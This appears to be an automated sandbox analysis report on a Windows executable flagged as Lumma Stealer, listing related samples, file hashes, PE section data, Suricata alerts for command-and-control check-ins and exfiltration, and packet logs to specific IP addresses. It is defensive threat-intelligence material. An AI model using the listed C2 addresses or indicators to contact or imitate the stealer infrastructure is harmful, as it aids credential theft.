	https://mandrillapp.com/track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4RlFTd1dycTkzR1FPbEFuczlLREd2VzRJQ2Z2eGo4WjVDSkQxUTlXdDVvME5XNWMwY0tIaXpVQWJ1YnBhT2dtS2pjVkxkaDFZWE8ybklsdFRlb2VQZ2dVTCZ0YXJnZXQ9NjMxZjQyMGVlZDEzY2EzYmNmNzdjMzI0JnVybD1odHRwczpcXFwvXFxcL21haW4uZDNxczBuMG9xdjNnN28uYW1wbGlmeWFwcC5jb21cIixcImlkXCI6XCI5ZTdkODJiNWQ0NzA0YWVhYTQ1ZjkxY2Y0ZTFmNGRiMFwiLFwidXJsX2lkc1wiOltcImY5ODQ5NWVhMjMyYTgzNjg1ODUxN2Y4ZTRiOTVjZjg4MWZlODExNmJcIl19In0	Get hash	malicious	Unknown	Browse	44.226.126.181
	payment_3493.pdf	Get hash	malicious	Unknown	Browse	185.166.143.48
	https://email.equifaxbreachsettlement.com/c/eJwczbFugzAQANCvsccIzoaYwQMNWE1VEQoM2SxzPgRSCJS4pfn7qt2f9Lx2FDunOOn4KGQWZUopPmqCAb0Uie8hxR6VP6bocQBKMO4TJfikIQIZAwAIkFIdhB9SzAQJJdOk90cmI_r8mgb302_kcHxQCDea6R4OuMz8pscQ1gcTOQPDwOz7fpif60armzzSPdD25xiYjTzRzIQhXDwxUZzeTHN9iV5l137wTXdV-d5eKgXAZPR047L8B0GX5mrr5mKbvMtt3ZR1fi7sKW8KW5zbzrZlVfBvDb8BAAD__6sTT70	Get hash	malicious	HtmlDropper	Browse	13.56.148.153
	https://mandrillapp.com/track/click/30903880/lamp.avocet.io?p=eyJzIjoiM2NCLS1TMlk4RWF3Nl9vVXV4SHlzRDZ5dmJJIiwidiI6MSwicCI6IntcInVcIjozMDkwMzg4MCxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2xhbXAuYXZvY2V0LmlvXFxcL25ldy11c2VyXCIsXCJpZFwiOlwiMTMxMTQyZmQwMzMxNDA4MWE0YmQyOGYzZDRmYmViYzRcIixcInVybF9pZHNcIjpbXCI0OWFlZTViODJkYzk4NGYxNTg2ZGIzZTYzNGE5ZWUxMDgxYjVmMDY5XCJdfSJ9	Get hash	malicious	Unknown	Browse	76.223.125.47
	R2-Signed.exe	Get hash	malicious	ValleyRAT	Browse	18.139.89.40
	TsWpfWrp.exe	Get hash	malicious	ValleyRAT	Browse	52.74.204.186
	Archivo-PxFkiLTWYG-23122024095010.hta	Get hash	malicious	Unknown	Browse	3.5.232.230

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	fr2Mul3G6m.exe	Get hash	malicious	LummaC	Browse	185.166.143.49 104.21.36.201 52.217.75.84
	t8cdzT49Yr.exe	Get hash	malicious	LummaC	Browse	185.166.143.49 104.21.36.201 52.217.75.84
	file.exe	Get hash	malicious	LummaC	Browse	185.166.143.49 104.21.36.201 52.217.75.84
	acronis recovery expert deluxe 1.0.0.132.rarl.exe	Get hash	malicious	LummaC	Browse	185.166.143.49 104.21.36.201 52.217.75.84
	FBmz85HS0d.exe	Get hash	malicious	LummaC	Browse	185.166.143.49 104.21.36.201 52.217.75.84
	BJQizQ6sqT.exe	Get hash	malicious	LummaC	Browse	185.166.143.49 104.21.36.201 52.217.75.84
	2ZsJ2iP8Q2.exe	Get hash	malicious	LummaC	Browse	185.166.143.49 104.21.36.201 52.217.75.84
	LopCYSStr3.exe	Get hash	malicious	LummaC	Browse	185.166.143.49 104.21.36.201 52.217.75.84
	LNn56KMkEE.exe	Get hash	malicious	LummaC	Browse	185.166.143.49 104.21.36.201 52.217.75.84
	VBHyEN96Pw.exe	Get hash	malicious	LummaC	Browse	185.166.143.49 104.21.36.201 52.217.75.84

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_OtHVIQ2ge4.exe_5dacb62bd6a6a5eb7fe2529a9545383a937b_5a9d21f3_b1cf8786-64a9-40b3-94f7-a647c6153908\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0424090087527706
Encrypted:	false
SSDEEP:	192:Oc8Eml0BU/HafjudxXOfzuiFXZ24IO825:6EmGBU/wjzzuiFXY4IO8Q
MD5:	F10F15F04BD49877438FBB30FAD2937E
SHA1:	0E43B061E0385C64FC69FEA5CC08BA9008C64D79
SHA-256:	D54561672711C3211491F61FE078D144FC7E09224491DA028DF18CA6B3508BDB
SHA-512:	B7406B71BE891B5804051499AFE105E0B8BD6F6AA2CF8B3670D451C0B4C970675891EEC3DAA1809751B538D8C16CF221E38A6F08728CEBFCDC953EB826B9840A
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.4.4.4.4.8.5.2.7.9.8.8.6.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.4.4.4.4.8.6.3.2.6.7.6.8.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.1.c.f.8.7.8.6.-.6.4.a.9.-.4.0.b.3.-.9.4.f.7.-.a.6.4.7.c.6.1.5.3.9.0.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.4.d.5.9.8.2.8.-.c.5.9.f.-.4.d.d.3.-.9.e.2.4.-.0.c.6.9.8.2.6.f.4.8.3.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.O.t.H.V.I.Q.2.g.e.4...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.9.8.-.0.0.0.1.-.0.0.1.4.-.4.4.e.5.-.0.f.a.3.5.6.5.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.e.0.9.9.4.3.e.f.5.2.6.2.4.9.3.9.e.1.b.e.3.2.f.3.6.9.8.3.f.1.6.0.0.0.0.f.f.f.f.!.0.0.0.0.3.8.6.6.5.5.6.0.1.b.a.9.0.5.a.6.3.7.b.7.a.8.a.3.7.d.0.3.1.f.0.8.7.f.d.6.6.f.3.c.!.O.t.H.V.I.Q.2.g.e.4...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER63A.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Mon Dec 23 16:21:25 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	280510
Entropy (8bit):	1.5320720348519863
Encrypted:	false
SSDEEP:	768:667BBZ5U+KpVoxr5Vu8GliVh2XVQwx+8damD5Ufgo:6xh2/o8Gly1wQeaI5UfP
MD5:	FC931CDFFE7FB7D712CEB0853F87C233
SHA1:	25529F7D43190F53D012B86099199B6CB0717216
SHA-256:	8C2C312F17543AA9DA9D0F38289BAC69C00244C2BBE94DC7A569B007B90AA559
SHA-512:	08BA1D78718DB29BDF942A6FCF484063FC3C9129F8FF8BD4B0F8C7C11A2632B28938E5E3183D4A1926A91D931B1E7CC930A8C3169E6864FFBD91DF06059B7131
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .........ig....................................D....'..........L...........`.......8...........T...........(L...............(...........*..............................................................................eJ......`+......GenuineIntel............T............ig.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER783.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8382
Entropy (8bit):	3.706842208177272
Encrypted:	false
SSDEEP:	192:R6l7wVeJ2i6R6YcDPSUlgmfPRprL89bPzsfH2Fm:R6lXJL6R6YoSUlgmfPAPYfl
MD5:	48E0F0A878DAC2BA371CEB5BAEB3786D
SHA1:	93BD7BEA4DF0BD2B83BE0648B205C652BDD9A66D
SHA-256:	A910C1D79C4A73464489E27E4CA396AD46AFB1BD0969F6203D7CA9FBB68F0D14
SHA-512:	8C86522D5BE2F7A4B02DDB7E7206B15CFE8D46C273278D2CABD9D1255E676EF45F670E01FEFCCA4E5A22780193506462A22032AE9F33AD95C843ED244AEBA3A7
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.8.3.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7D2.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4624
Entropy (8bit):	4.5075730856693985
Encrypted:	false
SSDEEP:	48:cvIwWl8zsdJg77aI9M3WpW8VYeb0Ym8M4JRKLBFj+q8f67EiVzHBRd:uIjf3I7mG7VzNJcPHEiVzHBRd
MD5:	9C28B5B734B5BA8D84DAEA429C6FF6ED
SHA1:	CF0C00033A30CA3C3D751D5FC95A7240E5681545
SHA-256:	AD53F4AB45E654E518C1758002279B7347E26CA7A0A805DC2AC17053D95D2F04
SHA-512:	39B13D4C1921A57D65B50A040D5F9D4F38BEE45D4CD710E069A0ACF2E91F65C4C41219612271632018307A28B4A17E880E9C8C2A39325A0D2F1FEC8D98E203B0
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="644124" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.3937960790467745
Encrypted:	false
SSDEEP:	6144:Gl4fiJoH0ncNXiUjt10q0G/gaocYGBoaUMMhA2NX4WABlBuNAEOBSqa:G4vF0MYQUMM6VFYSEU
MD5:	1365A8216351BC58A029AD7439095C2B
SHA1:	E6BB90851C3AE93EED50A5FBBF974B2C1D7D91A2
SHA-256:	E44EB70CEFAE0F54FF07611EC4E7EA50A313861F733B6BF4C926F78E34E695B8
SHA-512:	AB044794135052E58070B849BA58A01D3E530E1DCC0271ED4009878FC5B4B973B8F0F23EEFE229E3DF930D8E0C8C302A46C83CD705E7C7E2A2396CB13D929B5D
Malicious:	false
Reputation:	low
Preview:	regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm~;O.VU...............................................................................................................................................................................................................................................................................................................................................dX.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.573688666056447
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	OtHVIQ2ge4.exe
File size:	2'976'256 bytes
MD5:	4ba0641b1f9224605df854c9baaa5dcf
SHA1:	386655601ba905a637b7a8a37d031f087fd66f3c
SHA256:	7cadf23c992d86cba2587cdf6ddccc39a0d72deb6eef34eb64aae0c097e2f54a
SHA512:	597c5e6d8d3b8de0620cccaf01bd5bdd58a07a5f85c14400441246e384a2b9a88fd262ab647160a962c20522339210cdfb32373a6e52567c1d1078d9731b8c1b
SSDEEP:	49152:vxtbktPjGVeVCBUiaGHIepN2xmOn3b4jrWmc:pBktPjVCWZGHIepN2xmO3b4j
TLSH:	C0D54B62B64576CFD88A23748427CD42795D83FA0B20DDD3DC6DA87A7D63CC12ABAC14
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.............................@0...........@..........................p0......~-...@.................................T0..h..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x704000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FF62933F3CAh
cmovs ebp, dword ptr [00000000h]
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [0000000Ah], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add cl, byte ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or al, 80h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 0000000Ah
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx+ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or al, 80h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x53054	0x68	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x531f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x51000	0x24800	731d7b33384d23e6914faaeba26e169e	False	0.9973512414383562	data	7.983564281596194	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x52000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x53000	0x1000	0x200	19a29171433eeef17e42fd663f137134	False	0.14453125	data	0.9996515881509258	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
hmbcuswq	0x54000	0x2af000	0x2aea00	851bcd3e69c828e66e094ffa0f86bef2	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
jagdmkfn	0x303000	0x1000	0x400	b1a5da664f0a3a616c3c93abef190129	False	0.8115234375	data	6.29782700818507	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x304000	0x3000	0x2200	161fb7f82da3621cb174b063876f5ba7	False	0.05422794117647059	DOS executable (COM)	0.5713453059777756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-23T17:20:56.264024+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49717	104.21.36.201	443	TCP
2024-12-23T17:20:56.994147+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.9	49717	104.21.36.201	443	TCP
2024-12-23T17:20:56.994147+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.9	49717	104.21.36.201	443	TCP
2024-12-23T17:20:58.221530+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49723	104.21.36.201	443	TCP
2024-12-23T17:20:59.644133+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.9	49723	104.21.36.201	443	TCP
2024-12-23T17:20:59.644133+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.9	49723	104.21.36.201	443	TCP
2024-12-23T17:21:01.343367+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49729	104.21.36.201	443	TCP
2024-12-23T17:21:02.342460+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.9	49729	104.21.36.201	443	TCP
2024-12-23T17:21:03.705955+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49735	104.21.36.201	443	TCP
2024-12-23T17:21:06.471599+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49741	104.21.36.201	443	TCP
2024-12-23T17:21:08.970444+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49747	104.21.36.201	443	TCP
2024-12-23T17:21:11.861870+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49759	104.21.36.201	443	TCP
2024-12-23T17:21:11.866061+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.9	49759	104.21.36.201	443	TCP
2024-12-23T17:21:17.048269+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49770	104.21.36.201	443	TCP
2024-12-23T17:21:17.805059+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.9	49770	104.21.36.201	443	TCP
2024-12-23T17:21:19.529477+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49776	185.166.143.49	443	TCP
2024-12-23T17:21:22.009924+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49783	52.217.75.84	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 23, 2024 17:20:55.041775942 CET	49717	443	192.168.2.9	104.21.36.201
Dec 23, 2024 17:20:55.041830063 CET	443	49717	104.21.36.201	192.168.2.9
Dec 23, 2024 17:20:55.041882038 CET	49717	443	192.168.2.9	104.21.36.201
Dec 23, 2024 17:20:55.045643091 CET	49717	443	192.168.2.9	104.21.36.201
Dec 23, 2024 17:20:55.045659065 CET	443	49717	104.21.36.201	192.168.2.9
Dec 23, 2024 17:20:56.263859034 CET	443	49717	104.21.36.201	192.168.2.9
Dec 23, 2024 17:20:56.264024019 CET	49717	443	192.168.2.9	104.21.36.201
Dec 23, 2024 17:20:56.267725945 CET	49717	443	192.168.2.9	104.21.36.201
Dec 23, 2024 17:20:56.267740965 CET	443	49717	104.21.36.201	192.168.2.9
Dec 23, 2024 17:20:56.268024921 CET	443	49717	104.21.36.201	192.168.2.9
Dec 23, 2024 17:20:56.312599897 CET	49717	443	192.168.2.9	104.21.36.201
Dec 23, 2024 17:20:56.321856976 CET	49717	443	192.168.2.9	104.21.36.201
Dec 23, 2024 17:20:56.321880102 CET	49717	443	192.168.2.9	104.21.36.201
Dec 23, 2024 17:20:56.321935892 CET	443	49717	104.21.36.201	192.168.2.9
Dec 23, 2024 17:20:56.994154930 CET	443	49717	104.21.36.201	192.168.2.9
Dec 23, 2024 17:20:56.994273901 CET	443	49717	104.21.36.201	192.168.2.9
Dec 23, 2024 17:20:56.994369030 CET	49717	443	192.168.2.9	104.21.36.201
Dec 23, 2024 17:20:56.996645927 CET	49717	443	192.168.2.9	104.21.36.201
Dec 23, 2024 17:20:56.996670008 CET	443	49717	104.21.36.201	192.168.2.9
Dec 23, 2024 17:20:57.004667044 CET	49723	443	192.168.2.9	104.21.36.201
Dec 23, 2024 17:20:57.004709959 CET	443	49723	104.21.36.201	192.168.2.9
Dec 23, 2024 17:20:57.004867077 CET	49723	443	192.168.2.9	104.21.36.201
Dec 23, 2024 17:20:57.005064011 CET	49723	443	192.168.2.9	104.21.36.201
Dec 23, 2024 17:20:57.005074978 CET	443	49723	104.21.36.201	192.168.2.9
Dec 23, 2024 17:20:58.221404076 CET	443	49723	104.21.36.201	192.168.2.9
Dec 23, 2024 17:20:58.221529961 CET	49723	443	192.168.2.9	104.21.36.201
Dec 23, 2024 17:20:58.276669979 CET	49723	443	192.168.2.9	104.21.36.201
Dec 23, 2024 17:20:58.276700974 CET	443	49723	104.21.36.201	192.168.2.9
Dec 23, 2024 17:20:58.277055979 CET	443	49723	104.21.36.201	192.168.2.9
Dec 23, 2024 17:20:58.279011011 CET	49723	443	192.168.2.9	104.21.36.201
Dec 23, 2024 17:20:58.279011011 CET	49723	443	192.168.2.9	104.21.36.201
Dec 23, 2024 17:20:58.279090881 CET	443	49723	104.21.36.201	192.168.2.9
Dec 23, 2024 17:20:59.644143105 CET	443	49723	104.21.36.201	192.168.2.9
Dec 23, 2024 17:20:59.644196033 CET	443	49723	104.21.36.201	192.168.2.9
Dec 23, 2024 17:20:59.644227982 CET	443	49723	104.21.36.201	192.168.2.9
Dec 23, 2024 17:20:59.644270897 CET	443	49723	104.21.36.201	192.168.2.9
Dec 23, 2024 17:20:59.644304991 CET	49723	443	192.168.2.9	104.21.36.201
Dec 23, 2024 17:20:59.644321918 CET	443	49723	104.21.36.201	192.168.2.9
Dec 23, 2024 17:20:59.644419909 CET	49723	443	192.168.2.9	104.21.36.201
Dec 23, 2024 17:20:59.652198076 CET	443	49723	104.21.36.201	192.168.2.9
Dec 23, 2024 17:20:59.652287006 CET	49723	443	192.168.2.9	104.21.36.201
Dec 23, 2024 17:20:59.652318001 CET	443	49723	104.21.36.201	192.168.2.9
Dec 23, 2024 17:20:59.660713911 CET	443	49723	104.21.36.201	192.168.2.9
Dec 23, 2024 17:20:59.660865068 CET	49723	443	192.168.2.9	104.21.36.201
Dec 23, 2024 17:20:59.660891056 CET	443	49723	104.21.36.201	192.168.2.9
Dec 23, 2024 17:20:59.669110060 CET	443	49723	104.21.36.201	192.168.2.9
Dec 23, 2024 17:20:59.669208050 CET	49723	443	192.168.2.9	104.21.36.201
Dec 23, 2024 17:20:59.669226885 CET	443	49723	104.21.36.201	192.168.2.9
Dec 23, 2024 17:20:59.718911886 CET	49723	443	192.168.2.9	104.21.36.201
Dec 23, 2024 17:20:59.718941927 CET	443	49723	104.21.36.201	192.168.2.9
Dec 23, 2024 17:20:59.765758038 CET	49723	443	192.168.2.9	104.21.36.201
Dec 23, 2024 17:20:59.836550951 CET	443	49723	104.21.36.201	192.168.2.9
Dec 23, 2024 17:20:59.838583946 CET	443	49723	104.21.36.201	192.168.2.9
Dec 23, 2024 17:20:59.838634014 CET	49723	443	192.168.2.9	104.21.36.201
Dec 23, 2024 17:20:59.838660955 CET	443	49723	104.21.36.201	192.168.2.9
Dec 23, 2024 17:20:59.846483946 CET	443	49723	104.21.36.201	192.168.2.9
Dec 23, 2024 17:20:59.846564054 CET	49723	443	192.168.2.9	104.21.36.201
Dec 23, 2024 17:20:59.846765041 CET	49723	443	192.168.2.9	104.21.36.201
Dec 23, 2024 17:20:59.846765041 CET	49723	443	192.168.2.9	104.21.36.201
Dec 23, 2024 17:20:59.846784115 CET	443	49723	104.21.36.201	192.168.2.9
Dec 23, 2024 17:20:59.846793890 CET	443	49723	104.21.36.201	192.168.2.9
Dec 23, 2024 17:21:00.127456903 CET	49729	443	192.168.2.9	104.21.36.201
